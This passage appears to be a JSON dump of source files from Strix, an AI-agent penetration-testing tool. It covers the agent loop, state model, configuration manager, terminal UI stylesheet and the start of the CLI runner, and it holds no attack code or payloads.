hasattr(final_response, \"tool_invocations\") and final_response.tool_invocations\n else []\n )\n\n if actions:\n return await self._execute_actions(actions, tracer)\n\n return None\n\n async def _execute_actions(self, actions: list[Any], tracer: Optional[\"Tracer\"]) -> bool:\n \"\"\"Execute actions and return True if agent should finish.\"\"\"\n for action in actions:\n self.state.add_action(action)\n\n conversation_history = self.state.get_conversation_history()\n\n tool_task = asyncio.create_task(\n process_tool_invocations(actions, conversation_history, self.state)\n )\n self._current_task = tool_task\n\n try:\n should_agent_finish = await tool_task\n self._current_task = None\n except asyncio.CancelledError:\n self._current_task = None\n self.state.add_error(\"Tool execution cancelled by user\")\n raise\n\n self.state.messages = conversation_history\n\n if should_agent_finish:\n self.state.set_completed({\"success\": True})\n if tracer:\n tracer.update_agent_status(self.state.agent_id, \"completed\")\n if not self.interactive and self.state.parent_id is None:\n return True\n return True\n\n return False\n\n def _check_agent_messages(self, state: AgentState) -> None: # noqa: PLR0912\n try:\n from strix.tools.agents_graph.agents_graph_actions import _agent_graph, _agent_messages\n\n agent_id = state.agent_id\n if not agent_id or agent_id not in _agent_messages:\n return\n\n messages = _agent_messages[agent_id]\n if messages:\n has_new_messages = False\n for message in messages:\n if not message.get(\"read\", False):\n sender_id = message.get(\"from\")\n\n if state.is_waiting_for_input():\n if state.llm_failed:\n if sender_id == \"user\":\n state.resume_from_waiting()\n has_new_messages = True\n\n from strix.telemetry.tracer import get_global_tracer\n\n tracer = get_global_tracer()\n if tracer:\n tracer.update_agent_status(state.agent_id, \"running\")\n else:\n state.resume_from_waiting()\n has_new_messages = True\n\n from strix.telemetry.tracer import get_global_tracer\n\n tracer = get_global_tracer()\n if tracer:\n tracer.update_agent_status(state.agent_id, \"running\")\n\n if sender_id == \"user\":\n sender_name = \"User\"\n state.add_message(\"user\", message.get(\"content\", \"\"))\n else:\n if sender_id and sender_id in _agent_graph.get(\"nodes\", {}):\n sender_name = _agent_graph[\"nodes\"][sender_id][\"name\"]\n\n message_content = f\"\"\"\n \n You have received a message from another agent. You should acknowledge\n this message and respond appropriately based on its content. However, DO NOT echo\n back or repeat the entire message structure in your response. Simply process the\n content and respond naturally as/if needed.\n \n \n {sender_name}\n {sender_id}\n \n \n {message.get(\"message_type\", \"information\")}\n {message.get(\"priority\", \"normal\")}\n {message.get(\"timestamp\", \"\")}\n \n \n{message.get(\"content\", \"\")}\n \n \n This message was delivered during your task execution.\n Please acknowledge and respond if needed.\n \n\"\"\"\n state.add_message(\"user\", message_content.strip())\n\n message[\"read\"] = True\n\n if has_new_messages and not state.is_waiting_for_input():\n from strix.telemetry.tracer import get_global_tracer\n\n tracer = get_global_tracer()\n if tracer:\n tracer.update_agent_status(agent_id, \"running\")\n\n except (AttributeError, KeyError, TypeError) as e:\n import logging\n\n logger = logging.getLogger(__name__)\n logger.warning(f\"Error checking agent messages: {e}\")\n return\n\n def _handle_sandbox_error(\n self,\n error: SandboxInitializationError,\n tracer: Optional[\"Tracer\"],\n ) -> dict[str, Any]:\n error_msg = str(error.message)\n error_details = error.details\n self.state.add_error(error_msg)\n\n if not self.interactive:\n self.state.set_completed({\"success\": False, \"error\": error_msg})\n if tracer:\n tracer.update_agent_status(self.state.agent_id, \"failed\", error_msg)\n if error_details:\n exec_id = tracer.log_tool_execution_start(\n self.state.agent_id,\n \"sandbox_error_details\",\n {\"error\": error_msg, \"details\": error_details},\n )\n tracer.update_tool_execution(exec_id, \"failed\", {\"details\": error_details})\n return {\"success\": False, \"error\": error_msg, \"details\": error_details}\n\n self.state.enter_waiting_state()\n if tracer:\n tracer.update_agent_status(self.state.agent_id, \"sandbox_failed\", error_msg)\n if error_details:\n exec_id = tracer.log_tool_execution_start(\n self.state.agent_id,\n \"sandbox_error_details\",\n {\"error\": error_msg, \"details\": error_details},\n )\n tracer.update_tool_execution(exec_id, \"failed\", {\"details\": error_details})\n\n return {\"success\": False, \"error\": error_msg, \"details\": error_details}\n\n def _handle_llm_error(\n self,\n error: LLMRequestFailedError,\n tracer: Optional[\"Tracer\"],\n ) -> dict[str, Any] | None:\n error_msg = str(error)\n error_details = getattr(error, \"details\", None)\n self.state.add_error(error_msg)\n\n if not self.interactive:\n self.state.set_completed({\"success\": False, \"error\": error_msg})\n if tracer:\n tracer.update_agent_status(self.state.agent_id, \"failed\", error_msg)\n if error_details:\n exec_id = tracer.log_tool_execution_start(\n self.state.agent_id,\n \"llm_error_details\",\n {\"error\": error_msg, \"details\": error_details},\n )\n tracer.update_tool_execution(exec_id, \"failed\", {\"details\": error_details})\n return {\"success\": False, \"error\": error_msg}\n\n self.state.enter_waiting_state(llm_failed=True)\n if tracer:\n tracer.update_agent_status(self.state.agent_id, \"llm_failed\", error_msg)\n if error_details:\n exec_id = tracer.log_tool_execution_start(\n self.state.agent_id,\n \"llm_error_details\",\n {\"error\": error_msg, \"details\": error_details},\n )\n tracer.update_tool_execution(exec_id, \"failed\", {\"details\": error_details})\n\n return None\n\n async def _handle_iteration_error(\n self,\n error: RuntimeError | ValueError | TypeError | asyncio.CancelledError,\n tracer: Optional[\"Tracer\"],\n ) -> bool:\n error_msg = f\"Error in iteration {self.state.iteration}: {error!s}\"\n logger.exception(error_msg)\n self.state.add_error(error_msg)\n if tracer:\n tracer.update_agent_status(self.state.agent_id, \"error\")\n return True\n\n def cancel_current_execution(self) -> None:\n self._force_stop = True\n if self._current_task and not self._current_task.done():\n try:\n loop = self._current_task.get_loop()\n loop.call_soon_threadsafe(self._current_task.cancel)\n except RuntimeError:\n self._current_task.cancel()\n self._current_task = None\n" }, { "path": "strix/agents/state.py", "content": "import uuid\nfrom datetime import UTC, datetime\nfrom typing import Any\n\nfrom pydantic import BaseModel, Field\n\n\ndef _generate_agent_id() -> str:\n return f\"agent_{uuid.uuid4().hex[:8]}\"\n\n\nclass AgentState(BaseModel):\n agent_id: str = Field(default_factory=_generate_agent_id)\n agent_name: str = \"Strix Agent\"\n parent_id: str | None = None\n sandbox_id: str | None = None\n sandbox_token: str | None = None\n sandbox_info: dict[str, Any] | None = None\n\n task: str = \"\"\n iteration: int = 0\n max_iterations: int = 300\n completed: bool = False\n stop_requested: bool = False\n waiting_for_input: bool = False\n llm_failed: bool = False\n waiting_start_time: datetime | None = None\n waiting_timeout: int = 600\n final_result: dict[str, Any] | None = None\n max_iterations_warning_sent: bool = False\n\n messages: list[dict[str, Any]] = Field(default_factory=list)\n context: dict[str, Any] = Field(default_factory=dict)\n\n start_time: str = Field(default_factory=lambda: datetime.now(UTC).isoformat())\n last_updated: str = Field(default_factory=lambda: datetime.now(UTC).isoformat())\n\n actions_taken: list[dict[str, Any]] = Field(default_factory=list)\n observations: list[dict[str, Any]] = Field(default_factory=list)\n\n errors: list[str] = Field(default_factory=list)\n\n def increment_iteration(self) -> None:\n self.iteration += 1\n self.last_updated = datetime.now(UTC).isoformat()\n\n def add_message(\n self, role: str, content: Any, thinking_blocks: list[dict[str, Any]] | None = None\n ) -> None:\n message = {\"role\": role, \"content\": content}\n if thinking_blocks:\n message[\"thinking_blocks\"] = thinking_blocks\n self.messages.append(message)\n self.last_updated = datetime.now(UTC).isoformat()\n\n def add_action(self, action: dict[str, Any]) -> None:\n self.actions_taken.append(\n {\n \"iteration\": self.iteration,\n \"timestamp\": datetime.now(UTC).isoformat(),\n \"action\": action,\n }\n )\n\n def add_observation(self, observation: dict[str, Any]) -> None:\n self.observations.append(\n {\n \"iteration\": self.iteration,\n \"timestamp\": datetime.now(UTC).isoformat(),\n \"observation\": observation,\n }\n )\n\n def add_error(self, error: str) -> None:\n self.errors.append(f\"Iteration {self.iteration}: {error}\")\n self.last_updated = datetime.now(UTC).isoformat()\n\n def update_context(self, key: str, value: Any) -> None:\n self.context[key] = value\n self.last_updated = datetime.now(UTC).isoformat()\n\n def set_completed(self, final_result: dict[str, Any] | None = None) -> None:\n self.completed = True\n self.final_result = final_result\n self.last_updated = datetime.now(UTC).isoformat()\n\n def request_stop(self) -> None:\n self.stop_requested = True\n self.last_updated = datetime.now(UTC).isoformat()\n\n def should_stop(self) -> bool:\n return self.stop_requested or self.completed or self.has_reached_max_iterations()\n\n def is_waiting_for_input(self) -> bool:\n return self.waiting_for_input\n\n def enter_waiting_state(self, llm_failed: bool = False) -> None:\n self.waiting_for_input = True\n self.waiting_start_time = datetime.now(UTC)\n self.llm_failed = llm_failed\n self.last_updated = datetime.now(UTC).isoformat()\n\n def resume_from_waiting(self, new_task: str | None = None) -> None:\n self.waiting_for_input = False\n self.waiting_start_time = None\n self.stop_requested = False\n self.completed = False\n self.llm_failed = False\n if new_task:\n self.task = new_task\n self.last_updated = datetime.now(UTC).isoformat()\n\n def has_reached_max_iterations(self) -> bool:\n return self.iteration >= self.max_iterations\n\n def is_approaching_max_iterations(self, threshold: float = 0.85) -> bool:\n return self.iteration >= int(self.max_iterations * threshold)\n\n def has_waiting_timeout(self) -> bool:\n if self.waiting_timeout == 0:\n return False\n\n if not self.waiting_for_input or not self.waiting_start_time:\n return False\n\n if (\n self.stop_requested\n or self.llm_failed\n or self.completed\n or self.has_reached_max_iterations()\n ):\n return False\n\n elapsed = (datetime.now(UTC) - self.waiting_start_time).total_seconds()\n return elapsed > self.waiting_timeout\n\n def has_empty_last_messages(self, count: int = 3) -> bool:\n if len(self.messages) < count:\n return False\n\n last_messages = self.messages[-count:]\n\n for message in last_messages:\n content = message.get(\"content\", \"\")\n if isinstance(content, str) and content.strip():\n return False\n\n return True\n\n def get_conversation_history(self) -> list[dict[str, Any]]:\n return self.messages\n\n def get_execution_summary(self) -> dict[str, Any]:\n return {\n \"agent_id\": self.agent_id,\n \"agent_name\": self.agent_name,\n \"parent_id\": self.parent_id,\n \"sandbox_id\": self.sandbox_id,\n \"sandbox_info\": self.sandbox_info,\n \"task\": self.task,\n \"iteration\": self.iteration,\n \"max_iterations\": self.max_iterations,\n \"completed\": self.completed,\n \"final_result\": self.final_result,\n \"start_time\": self.start_time,\n \"last_updated\": self.last_updated,\n \"total_actions\": len(self.actions_taken),\n \"total_observations\": len(self.observations),\n \"total_errors\": len(self.errors),\n \"has_errors\": len(self.errors) > 0,\n \"max_iterations_reached\": self.has_reached_max_iterations() and not self.completed,\n }\n" }, { "path": "strix/config/__init__.py", "content": "from strix.config.config import (\n Config,\n apply_saved_config,\n save_current_config,\n)\n\n\n__all__ = [\n \"Config\",\n \"apply_saved_config\",\n \"save_current_config\",\n]\n" }, { "path": "strix/config/config.py", "content": "import contextlib\nimport json\nimport os\nfrom pathlib import Path\nfrom typing import Any\n\n\nSTRIX_API_BASE = \"https://models.strix.ai/api/v1\"\n\n\nclass Config:\n \"\"\"Configuration Manager for Strix.\"\"\"\n\n # LLM Configuration\n strix_llm = None\n llm_api_key = None\n llm_api_base = None\n openai_api_base = None\n litellm_base_url = None\n ollama_api_base = None\n strix_reasoning_effort = \"high\"\n strix_llm_max_retries = \"5\"\n strix_memory_compressor_timeout = \"30\"\n llm_timeout = \"300\"\n _LLM_CANONICAL_NAMES = (\n \"strix_llm\",\n \"llm_api_key\",\n \"llm_api_base\",\n \"openai_api_base\",\n \"litellm_base_url\",\n \"ollama_api_base\",\n \"strix_reasoning_effort\",\n \"strix_llm_max_retries\",\n \"strix_memory_compressor_timeout\",\n \"llm_timeout\",\n )\n\n # Tool & Feature Configuration\n perplexity_api_key = None\n strix_disable_browser = \"false\"\n\n # Runtime Configuration\n strix_image = \"ghcr.io/usestrix/strix-sandbox:0.1.12\"\n strix_runtime_backend = \"docker\"\n strix_sandbox_execution_timeout = \"120\"\n strix_sandbox_connect_timeout = \"10\"\n\n # Telemetry\n strix_telemetry = \"1\"\n strix_otel_telemetry = None\n strix_posthog_telemetry = None\n traceloop_base_url = None\n traceloop_api_key = None\n traceloop_headers = None\n\n # Config file override (set via --config CLI arg)\n _config_file_override: Path | None = None\n\n @classmethod\n def _tracked_names(cls) -> list[str]:\n return [\n k\n for k, v in vars(cls).items()\n if not k.startswith(\"_\") and k[0].islower() and (v is None or isinstance(v, str))\n ]\n\n @classmethod\n def tracked_vars(cls) -> list[str]:\n return [name.upper() for name in cls._tracked_names()]\n\n @classmethod\n def _llm_env_vars(cls) -> set[str]:\n return {name.upper() for name in cls._LLM_CANONICAL_NAMES}\n\n @classmethod\n def _llm_env_changed(cls, saved_env: dict[str, Any]) -> bool:\n for var_name in cls._llm_env_vars():\n current = os.getenv(var_name)\n if current is None:\n continue\n if saved_env.get(var_name) != current:\n return True\n return False\n\n @classmethod\n def get(cls, name: str) -> str | None:\n env_name = name.upper()\n default = getattr(cls, name, None)\n return os.getenv(env_name, default)\n\n @classmethod\n def config_dir(cls) -> Path:\n return Path.home() / \".strix\"\n\n @classmethod\n def config_file(cls) -> Path:\n if cls._config_file_override is not None:\n return cls._config_file_override\n return cls.config_dir() / \"cli-config.json\"\n\n @classmethod\n def load(cls) -> dict[str, Any]:\n path = cls.config_file()\n if not path.exists():\n return {}\n try:\n with path.open(\"r\", encoding=\"utf-8\") as f:\n data: dict[str, Any] = json.load(f)\n return data\n except (json.JSONDecodeError, OSError):\n return {}\n\n @classmethod\n def save(cls, config: dict[str, Any]) -> bool:\n try:\n cls.config_dir().mkdir(parents=True, exist_ok=True)\n config_path = cls.config_dir() / \"cli-config.json\"\n with config_path.open(\"w\", encoding=\"utf-8\") as f:\n json.dump(config, f, indent=2)\n except OSError:\n return False\n with contextlib.suppress(OSError):\n config_path.chmod(0o600) # may fail on Windows\n return True\n\n @classmethod\n def apply_saved(cls, force: bool = False) -> dict[str, str]:\n saved = cls.load()\n env_vars = saved.get(\"env\", {})\n if not isinstance(env_vars, dict):\n env_vars = {}\n cleared_vars = {\n var_name\n for var_name in cls.tracked_vars()\n if var_name in os.environ and os.environ.get(var_name) == \"\"\n }\n if cleared_vars:\n for var_name in cleared_vars:\n env_vars.pop(var_name, None)\n if cls._config_file_override is None:\n cls.save({\"env\": env_vars})\n if cls._llm_env_changed(env_vars):\n for var_name in cls._llm_env_vars():\n env_vars.pop(var_name, None)\n if cls._config_file_override is None:\n cls.save({\"env\": env_vars})\n applied = {}\n\n for var_name, var_value in env_vars.items():\n if var_name in cls.tracked_vars() and (force or var_name not in os.environ):\n os.environ[var_name] = var_value\n applied[var_name] = var_value\n\n return applied\n\n @classmethod\n def capture_current(cls) -> dict[str, Any]:\n env_vars = {}\n for var_name in cls.tracked_vars():\n value = os.getenv(var_name)\n if value:\n env_vars[var_name] = value\n return {\"env\": env_vars}\n\n @classmethod\n def save_current(cls) -> bool:\n existing = cls.load().get(\"env\", {})\n merged = dict(existing)\n\n for var_name in cls.tracked_vars():\n value = os.getenv(var_name)\n if value is None:\n pass\n elif value == \"\":\n merged.pop(var_name, None)\n else:\n merged[var_name] = value\n\n return cls.save({\"env\": merged})\n\n\ndef apply_saved_config(force: bool = False) -> dict[str, str]:\n return Config.apply_saved(force=force)\n\n\ndef save_current_config() -> bool:\n return Config.save_current()\n\n\ndef resolve_llm_config() -> tuple[str | None, str | None, str | None]:\n \"\"\"Resolve LLM model, api_key, and api_base based on STRIX_LLM prefix.\n\n Returns:\n tuple: (model_name, api_key, api_base)\n - model_name: Original model name (strix/ prefix preserved for display)\n - api_key: LLM API key\n - api_base: API base URL (auto-set to STRIX_API_BASE for strix/ models)\n \"\"\"\n model = Config.get(\"strix_llm\")\n if not model:\n return None, None, None\n\n api_key = Config.get(\"llm_api_key\")\n\n if model.startswith(\"strix/\"):\n api_base: str | None = STRIX_API_BASE\n else:\n api_base = (\n Config.get(\"llm_api_base\")\n or Config.get(\"openai_api_base\")\n or Config.get(\"litellm_base_url\")\n or Config.get(\"ollama_api_base\")\n )\n\n return model, api_key, api_base\n" }, { "path": "strix/interface/__init__.py", "content": "from .main import main\n\n\n__all__ = [\"main\"]\n" }, { "path": "strix/interface/assets/tui_styles.tcss", "content": "Screen {\n background: #000000;\n color: #d4d4d4;\n}\n\n.screen--selection {\n background: #2d3d2f;\n color: #e5e5e5;\n}\n\nToastRack {\n dock: top;\n align: right top;\n margin-bottom: 0;\n margin-top: 1;\n}\n\nToast {\n width: 25;\n background: #000000;\n border-left: outer #22c55e;\n}\n\nToast.-information .toast--title {\n color: #22c55e;\n}\n\n#splash_screen {\n height: 100%;\n width: 100%;\n background: #000000;\n color: #22c55e;\n align: center middle;\n content-align: center middle;\n text-align: center;\n}\n\n#splash_content {\n width: auto;\n height: auto;\n background: transparent;\n text-align: center;\n content-align: center middle;\n padding: 2;\n}\n\n#main_container {\n height: 100%;\n padding: 0;\n margin: 0;\n background: #000000;\n}\n\n#content_container {\n height: 1fr;\n padding: 0;\n background: transparent;\n}\n\n#sidebar {\n width: 20%;\n background: transparent;\n margin-left: 1;\n}\n\n#sidebar.-hidden {\n display: none;\n}\n\n#agents_tree {\n height: 1fr;\n background: transparent;\n border: round #333333;\n border-title-color: #a8a29e;\n border-title-style: bold;\n padding: 1;\n margin-bottom: 0;\n}\n\n#stats_scroll {\n height: auto;\n max-height: 15;\n background: transparent;\n padding: 0;\n margin: 0;\n border: round #333333;\n scrollbar-size: 0 0;\n}\n\n#stats_display {\n height: auto;\n background: transparent;\n padding: 0 1;\n margin: 0;\n}\n\n#vulnerabilities_panel {\n height: auto;\n max-height: 12;\n background: transparent;\n padding: 0;\n margin: 0;\n border: round #333333;\n overflow-y: auto;\n scrollbar-background: #000000;\n scrollbar-color: #333333;\n scrollbar-corner-color: #000000;\n scrollbar-size-vertical: 1;\n}\n\n#vulnerabilities_panel.hidden {\n display: none;\n}\n\n.vuln-item {\n height: auto;\n width: 100%;\n padding: 0 1;\n background: transparent;\n color: #d4d4d4;\n}\n\n.vuln-item:hover {\n background: #1a1a1a;\n color: #fafaf9;\n}\n\nVulnerabilityDetailScreen {\n align: center middle;\n background: #000000 80%;\n}\n\n#vuln_detail_dialog {\n grid-size: 1;\n grid-gutter: 1;\n grid-rows: 1fr auto;\n padding: 2 3;\n width: 85%;\n max-width: 110;\n height: 85%;\n max-height: 45;\n border: solid #262626;\n background: #0a0a0a;\n}\n\n#vuln_detail_scroll {\n height: 1fr;\n background: transparent;\n scrollbar-background: #0a0a0a;\n scrollbar-color: #404040;\n scrollbar-corner-color: #0a0a0a;\n scrollbar-size: 1 1;\n padding-right: 1;\n}\n\n#vuln_detail_content {\n width: 100%;\n background: transparent;\n padding: 0;\n}\n\n#vuln_detail_buttons {\n width: 100%;\n height: auto;\n align: right middle;\n padding-top: 1;\n margin: 0;\n border-top: solid #1a1a1a;\n}\n\n#copy_vuln_detail {\n width: auto;\n min-width: 12;\n height: auto;\n background: transparent;\n color: #525252;\n border: none;\n text-style: none;\n margin: 0 1;\n padding: 0 2;\n}\n\n#close_vuln_detail {\n width: auto;\n min-width: 10;\n height: auto;\n background: transparent;\n color: #a3a3a3;\n border: none;\n text-style: none;\n margin: 0;\n padding: 0 2;\n}\n\n#copy_vuln_detail:hover, #copy_vuln_detail:focus {\n background: transparent;\n color: #22c55e;\n border: none;\n}\n\n#close_vuln_detail:hover, #close_vuln_detail:focus {\n background: transparent;\n color: #ffffff;\n border: none;\n}\n\n#chat_area_container {\n width: 80%;\n background: transparent;\n}\n\n#chat_area_container.-full-width {\n width: 100%;\n}\n\n#chat_history {\n height: 1fr;\n background: transparent;\n border: round #0a0a0a;\n padding: 0;\n margin-bottom: 0;\n margin-right: 0;\n scrollbar-background: #000000;\n scrollbar-color: #1a1a1a;\n scrollbar-corner-color: #000000;\n scrollbar-size: 1 1;\n}\n\n#agent_status_display {\n height: 1;\n background: transparent;\n margin: 0;\n padding: 0 1;\n}\n\n#agent_status_display.hidden {\n display: none;\n}\n\n#status_text {\n width: 1fr;\n height: 100%;\n background: transparent;\n color: #a3a3a3;\n text-align: left;\n content-align: left middle;\n text-style: none;\n margin: 0;\n padding: 0;\n}\n\n#keymap_indicator {\n width: auto;\n height: 100%;\n background: transparent;\n color: #737373;\n text-align: right;\n content-align: right middle;\n text-style: none;\n margin: 0;\n padding: 0;\n}\n\n#chat_input_container {\n height: 3;\n background: transparent;\n border: round #333333;\n margin-right: 0;\n padding: 0;\n layout: horizontal;\n align-vertical: top;\n}\n\n#chat_input_container:focus-within {\n border: round #22c55e;\n}\n\n#chat_input_container:focus-within #chat_prompt {\n color: #22c55e;\n text-style: bold;\n}\n\n#chat_prompt {\n width: auto;\n height: 100%;\n padding: 0 0 0 1;\n color: #737373;\n content-align-vertical: top;\n}\n\n#chat_history:focus {\n border: round #22c55e;\n}\n\n#chat_input {\n width: 1fr;\n height: 100%;\n background: transparent;\n border: none;\n color: #d4d4d4;\n padding: 0;\n margin: 0;\n}\n\n#chat_input:focus {\n border: none;\n}\n\n#chat_input .text-area--cursor-line {\n background: transparent;\n}\n\n#chat_input:focus .text-area--cursor-line {\n background: transparent;\n}\n\n#chat_input > .text-area--placeholder {\n color: #525252;\n text-style: italic;\n}\n\n#chat_input > .text-area--cursor {\n color: #22c55e;\n background: #22c55e;\n}\n\n.chat-placeholder {\n width: 100%;\n height: 100%;\n content-align: center middle;\n text-align: center;\n color: #737373;\n text-style: italic;\n}\n\n.chat-content {\n margin: 0 !important;\n margin-top: 0 !important;\n margin-bottom: 0 !important;\n padding: 0 1;\n background: transparent;\n width: 100%;\n}\n\n.chat-message {\n margin-bottom: 0;\n padding: 0;\n background: transparent;\n width: 100%;\n}\n\n.user-message {\n color: #e5e5e5;\n border-left: thick #3b82f6;\n padding-left: 1;\n margin-bottom: 1;\n}\n\n.tool-call {\n margin-top: 1;\n margin-bottom: 0;\n padding: 0 1;\n background: transparent;\n border: none;\n width: 100%;\n}\n\n.tool-call.status-completed {\n background: transparent;\n margin-top: 1;\n margin-bottom: 0;\n}\n\n.tool-call.status-running {\n background: transparent;\n margin-top: 1;\n margin-bottom: 0;\n}\n\n.tool-call.status-failed,\n.tool-call.status-error {\n background: transparent;\n margin-top: 1;\n margin-bottom: 0;\n}\n\n.browser-tool,\n.terminal-tool,\n.python-tool,\n.agents-graph-tool,\n.file-edit-tool,\n.proxy-tool,\n.notes-tool,\n.thinking-tool,\n.web-search-tool,\n.scan-info-tool,\n.subagent-info-tool {\n margin-top: 1;\n margin-bottom: 0;\n background: transparent;\n}\n\n.finish-tool,\n.reporting-tool {\n margin-top: 1;\n margin-bottom: 0;\n background: transparent;\n}\n\n.browser-tool.status-completed,\n.browser-tool.status-running,\n.terminal-tool.status-completed,\n.terminal-tool.status-running,\n.python-tool.status-completed,\n.python-tool.status-running,\n.agents-graph-tool.status-completed,\n.agents-graph-tool.status-running,\n.file-edit-tool.status-completed,\n.file-edit-tool.status-running,\n.proxy-tool.status-completed,\n.proxy-tool.status-running,\n.notes-tool.status-completed,\n.notes-tool.status-running,\n.thinking-tool.status-completed,\n.thinking-tool.status-running,\n.web-search-tool.status-completed,\n.web-search-tool.status-running,\n.scan-info-tool.status-completed,\n.scan-info-tool.status-running,\n.subagent-info-tool.status-completed,\n.subagent-info-tool.status-running {\n background: transparent;\n margin-top: 1;\n margin-bottom: 0;\n}\n\n.finish-tool.status-completed,\n.finish-tool.status-running,\n.reporting-tool.status-completed,\n.reporting-tool.status-running {\n background: transparent;\n margin-top: 1;\n margin-bottom: 0;\n}\n\nTree {\n background: transparent;\n color: #e7e5e4;\n scrollbar-background: transparent;\n scrollbar-color: #404040;\n scrollbar-corner-color: transparent;\n scrollbar-size: 1 1;\n}\n\nTree > .tree--label {\n text-style: bold;\n color: #a8a29e;\n background: transparent;\n padding: 0 1;\n margin-bottom: 1;\n border-bottom: solid #1a1a1a;\n text-align: center;\n}\n\n.tree--node {\n height: 1;\n padding: 0;\n margin: 0;\n}\n\n.tree--node-label {\n color: #d6d3d1;\n background: transparent;\n text-style: none;\n padding: 0 1;\n margin: 0 1;\n}\n\n.tree--node:hover .tree--node-label {\n background: transparent;\n color: #fafaf9;\n text-style: bold;\n border-left: solid #a8a29e;\n}\n\n.tree--node.-selected .tree--node-label {\n background: transparent;\n color: #fafaf9;\n text-style: bold;\n border-left: heavy #d6d3d1;\n}\n\n.tree--node.-expanded .tree--node-label {\n text-style: bold;\n color: #fafaf9;\n background: transparent;\n border-left: solid #78716c;\n}\n\nTree:focus {\n border: round #1a1a1a;\n}\n\nTree:focus > .tree--label {\n color: #fafaf9;\n text-style: bold;\n background: transparent;\n}\n\n.tree--node .tree--node .tree--node-label {\n color: #a8a29e;\n padding-left: 2;\n border: none;\n background: transparent;\n margin-left: 1;\n}\n\n.tree--node .tree--node:hover .tree--node-label {\n background: transparent;\n color: #e7e5e4;\n}\n\n.tree--node .tree--node .tree--node .tree--node-label {\n color: #78716c;\n padding-left: 3;\n text-style: none;\n border: none;\n background: transparent;\n margin-left: 2;\n}\n\nStopAgentScreen {\n align: center middle;\n background: $background 0%;\n}\n\n#stop_agent_dialog {\n grid-size: 1;\n grid-gutter: 1;\n grid-rows: auto auto;\n padding: 1;\n width: 30;\n height: auto;\n border: round #a3a3a3;\n background: #000000 98%;\n}\n\n#stop_agent_title {\n color: #a3a3a3;\n text-style: bold;\n text-align: center;\n width: 100%;\n margin-bottom: 0;\n}\n\n#stop_agent_buttons {\n grid-size: 2;\n grid-gutter: 1;\n grid-columns: 1fr 1fr;\n width: 100%;\n height: 1;\n}\n\n#stop_agent_buttons Button {\n height: 1;\n min-height: 1;\n border: none;\n text-style: bold;\n}\n\n#stop_agent {\n background: transparent;\n color: #ef4444;\n border: none;\n}\n\n#stop_agent:hover, #stop_agent:focus {\n background: #ef4444;\n color: #ffffff;\n border: none;\n}\n\n#cancel_stop {\n background: transparent;\n color: #737373;\n border: none;\n}\n\n#cancel_stop:hover, #cancel_stop:focus {\n background:rgb(54, 54, 54);\n color: #ffffff;\n border: none;\n}\n\nQuitScreen {\n align: center middle;\n background: $background 0%;\n}\n\n#quit_dialog {\n grid-size: 1;\n grid-gutter: 1;\n grid-rows: auto auto;\n padding: 1;\n width: 24;\n height: auto;\n border: round #333333;\n background: #000000 98%;\n}\n\n#quit_title {\n color: #d4d4d4;\n text-style: bold;\n text-align: center;\n width: 100%;\n margin-bottom: 0;\n}\n\n#quit_buttons {\n grid-size: 2;\n grid-gutter: 1;\n grid-columns: 1fr 1fr;\n width: 100%;\n height: 1;\n}\n\n#quit_buttons Button {\n height: 1;\n min-height: 1;\n border: none;\n text-style: bold;\n}\n\n#quit {\n background: transparent;\n color: #ef4444;\n border: none;\n}\n\n#quit:hover, #quit:focus {\n background: #ef4444;\n color: #ffffff;\n border: none;\n}\n\n#cancel {\n background: transparent;\n color: #737373;\n border: none;\n}\n\n#cancel:hover, #cancel:focus {\n background:rgb(54, 54, 54);\n color: #ffffff;\n border: none;\n}\n\nHelpScreen {\n align: center middle;\n background: $background 0%;\n}\n\n#dialog {\n grid-size: 1;\n grid-gutter: 0 1;\n grid-rows: auto auto;\n padding: 1 2;\n width: 40;\n height: auto;\n border: round #22c55e;\n background: #000000 98%;\n}\n\n#help_title {\n color: #22c55e;\n text-style: bold;\n text-align: center;\n width: 100%;\n margin-bottom: 1;\n}\n\n#help_content {\n color: #d4d4d4;\n text-align: left;\n width: 100%;\n margin-bottom: 1;\n padding: 0;\n background: transparent;\n text-style: none;\n}\n" }, { "path": "strix/interface/cli.py", "content": "import atexit\nimport signal\nimport sys\nimport threading\nimport time\nfrom typing import Any\n\nfrom rich.console import Console\nfrom rich.live import Live\nfrom rich.panel import Panel\nfrom rich.text import Text\n\nfrom strix.agents.StrixAgent import StrixAgent\nfrom strix.llm.config import LLMConfig\nfrom strix.telemetry.tracer import Tracer, set_global_tracer\n\nfrom .utils import (\n build_live_stats_text,\n format_vulnerability_report,\n)\n\n\nasync def run_cli(args: Any) -> None: # noqa: PLR0915\n console = Console()\n\n start_text = Text()\n start_text.append(\"Penetration test initiated\", style=\"bold #22c55e\")\n\n target_text = Text()\n target_text.append(\"Target\", style=\"dim\")\n target_text.append(\" \")\n if len(args.targets_info) == 1:\n target_text.append(args.targets_info[0][\"original\"], style=\"bold white\")\n else:\n target_text.append(f\"{len(args.targets_info)} targets\", style=\"bold white\")\n for target_info in args.targets_info:\n target_text.append(\"\\n \")\n target_text.append(target_info[\"original\"], style=\"white\")\n\n results_text = Text()\n results_text.append(\"Output\", style=\"dim\")\n results_text.append(\" \")\n results_text.append(f\"strix_runs/{args.run_name}\", style=\"#60a5fa\")\n\n note_text = Text()\n note_text.append(\"\\n\\n\", style=\"dim\")\n note_text.append(\"Vulnerabilities will be displayed in real-time.\", style=\"dim\")\n\n startup_panel = Panel(\n Text.assemble(\n start_text,\n \"\\n\\n\",\n target_text,\n \"\\n\",\n results_text,\n note_text,\n ),\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"#22c55e\",\n padding=(1, 2),\n )\n\n console.print(\"\\n\")\n console.print(startup_panel)\n console.print()\n\n scan_mode = getattr(args, \"scan_mode\", \"deep\")\n\n scan_config = {\n \"scan_id\": args.run_name,\n \"targets\": args.targets_info,\n \"user_instructions\": args.instruction or \"\",\n \"run_name\": args.run_name,\n }\n\n llm_config = LLMConfig(scan_mode=scan_mode)\n agent_config = {\n \"llm_config\": llm_config,\n \"max_iterations\": 300,\n }\n\n if getattr(args, \"local_sources\", None):\n agent_config[\"local_sources\"] = args.local_sources\n\n tracer = Tracer(args.run_name)\n tracer.set_scan_config(scan_config)\n\n def display_vulnerability(report: dict[str, Any]) -> None:\n report_id = report.get(\"id\", \"unknown\")\n\n vuln_text = format_vulnerability_report(report)\n\n vuln_panel = Panel(\n vuln_text,\n title=f\"[bold red]{report_id.upper()}\",\n title_align=\"left\",\n border_style=\"red\",\n padding=(1, 2),\n )\n\n console.print(vuln_panel)\n console.print()\n\n tracer.vulnerability_found_callback = display_vulnerability\n\n def cleanup_on_exit() -> None:\n from strix.runtime import cleanup_runtime\n\n tracer.cleanup()\n 